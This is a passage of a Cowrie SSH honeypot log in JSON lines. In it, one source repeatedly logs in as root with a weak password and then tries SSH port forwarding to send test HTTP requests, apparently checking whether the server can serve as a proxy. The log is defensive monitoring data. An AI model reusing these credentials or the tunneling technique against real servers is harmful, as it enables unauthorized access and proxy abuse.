256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:14.816278Z","src_ip":"77.83.207.83","session":"851fba142e4f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:15.062937Z","src_ip":"77.83.207.83","session":"851fba142e4f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":14485,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:14485","sensor":"my-vps","timestamp":"2025-08-31T03:53:15.113972Z","session":"851fba142e4f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:15.163521Z","src_ip":"77.83.207.83","session":"851fba142e4f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":26501,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:26501","sensor":"my-vps","timestamp":"2025-08-31T03:53:15.303837Z","session":"851fba142e4f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:15.353310Z","src_ip":"77.83.207.83","session":"851fba142e4f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":9732,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:9732","sensor":"my-vps","timestamp":"2025-08-31T03:53:15.495843Z","session":"851fba142e4f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:15.545398Z","src_ip":"77.83.207.83","session":"851fba142e4f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:15.595823Z","src_ip":"77.83.207.83","session":"851fba142e4f"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":39752,"dst_ip":"1.2.3.4","dst_port":22,"session":"656e6570e4ab","protocol":"ssh","message":"New connection: 77.83.207.83:39752 (1.2.3.4:22) [session: 656e6570e4ab]","sensor":"my-vps","timestamp":"2025-08-31T03:53:15.646386Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:15.647539Z","src_ip":"77.83.207.83","session":"656e6570e4ab"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:15.698395Z","src_ip":"77.83.207.83","session":"656e6570e4ab"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:15.951780Z","src_ip":"77.83.207.83","session":"656e6570e4ab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11678,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:11678","sensor":"my-vps","timestamp":"2025-08-31T03:53:16.004045Z","session":"656e6570e4ab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:16.055268Z","src_ip":"77.83.207.83","session":"656e6570e4ab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":20648,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:20648","sensor":"my-vps","timestamp":"2025-08-31T03:53:16.197275Z","session":"656e6570e4ab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:16.248213Z","src_ip":"77.83.207.83","session":"656e6570e4ab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":17471,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:17471","sensor":"my-vps","timestamp":"2025-08-31T03:53:16.393433Z","session":"656e6570e4ab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:16.444299Z","src_ip":"77.83.207.83","session":"656e6570e4ab"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:16.495842Z","src_ip":"77.83.207.83","session":"656e6570e4ab"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":39877,"dst_ip":"1.2.3.4","dst_port":22,"session":"19f5fe8920dc","protocol":"ssh","message":"New connection: 77.83.207.83:39877 (1.2.3.4:22) [session: 19f5fe8920dc]","sensor":"my-vps","timestamp":"2025-08-31T03:53:16.545735Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:16.546598Z","src_ip":"77.83.207.83","session":"19f5fe8920dc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:16.597805Z","src_ip":"77.83.207.83","session":"19f5fe8920dc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:16.853140Z","src_ip":"77.83.207.83","session":"19f5fe8920dc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":22286,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:22286","sensor":"my-vps","timestamp":"2025-08-31T03:53:16.905736Z","session":"19f5fe8920dc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:16.957070Z","src_ip":"77.83.207.83","session":"19f5fe8920dc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":25461,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:25461","sensor":"my-vps","timestamp":"2025-08-31T03:53:17.101642Z","session":"19f5fe8920dc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:17.152986Z","src_ip":"77.83.207.83","session":"19f5fe8920dc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":32721,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:32721","sensor":"my-vps","timestamp":"2025-08-31T03:53:17.297621Z","session":"19f5fe8920dc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:17.349142Z","src_ip":"77.83.207.83","session":"19f5fe8920dc"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:17.401425Z","src_ip":"77.83.207.83","session":"19f5fe8920dc"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":40177,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ddb3f4ce669","protocol":"ssh","message":"New connection: 77.83.207.83:40177 (1.2.3.4:22) [session: 4ddb3f4ce669]","sensor":"my-vps","timestamp":"2025-08-31T03:53:17.450030Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:17.459921Z","src_ip":"77.83.207.83","session":"4ddb3f4ce669"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:17.500278Z","src_ip":"77.83.207.83","session":"4ddb3f4ce669"}
{"eventid":"cowrie.session.closed","duration":"28.3","message":"Connection lost after 28.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:17.610053Z","src_ip":"212.227.125.160","session":"6e256c2689be"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:17.749152Z","src_ip":"77.83.207.83","session":"4ddb3f4ce669"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":17890,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:17890","sensor":"my-vps","timestamp":"2025-08-31T03:53:17.799907Z","session":"4ddb3f4ce669"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:17.849893Z","src_ip":"77.83.207.83","session":"4ddb3f4ce669"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4786,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:4786","sensor":"my-vps","timestamp":"2025-08-31T03:53:17.992282Z","session":"4ddb3f4ce669"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:18.043146Z","src_ip":"77.83.207.83","session":"4ddb3f4ce669"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":27243,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:27243","sensor":"my-vps","timestamp":"2025-08-31T03:53:18.184116Z","session":"4ddb3f4ce669"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:18.233816Z","src_ip":"77.83.207.83","session":"4ddb3f4ce669"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:18.284838Z","src_ip":"77.83.207.83","session":"4ddb3f4ce669"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":41005,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6f61ac9e0d8","protocol":"ssh","message":"New connection: 77.83.207.83:41005 (1.2.3.4:22) [session: e6f61ac9e0d8]","sensor":"my-vps","timestamp":"2025-08-31T03:53:18.333360Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:18.334366Z","src_ip":"77.83.207.83","session":"e6f61ac9e0d8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:18.384240Z","src_ip":"77.83.207.83","session":"e6f61ac9e0d8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:18.632912Z","src_ip":"77.83.207.83","session":"e6f61ac9e0d8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":18411,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:18411","sensor":"my-vps","timestamp":"2025-08-31T03:53:18.683994Z","session":"e6f61ac9e0d8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:18.733922Z","src_ip":"77.83.207.83","session":"e6f61ac9e0d8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7728,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:7728","sensor":"my-vps","timestamp":"2025-08-31T03:53:18.876227Z","session":"e6f61ac9e0d8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:18.926370Z","src_ip":"77.83.207.83","session":"e6f61ac9e0d8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":16833,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:16833","sensor":"my-vps","timestamp":"2025-08-31T03:53:19.068105Z","session":"e6f61ac9e0d8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:19.117922Z","src_ip":"77.83.207.83","session":"e6f61ac9e0d8"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:19.168786Z","src_ip":"77.83.207.83","session":"e6f61ac9e0d8"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":41848,"dst_ip":"1.2.3.4","dst_port":22,"session":"396143c57d91","protocol":"ssh","message":"New connection: 77.83.207.83:41848 (1.2.3.4:22) [session: 396143c57d91]","sensor":"my-vps","timestamp":"2025-08-31T03:53:19.220431Z"}
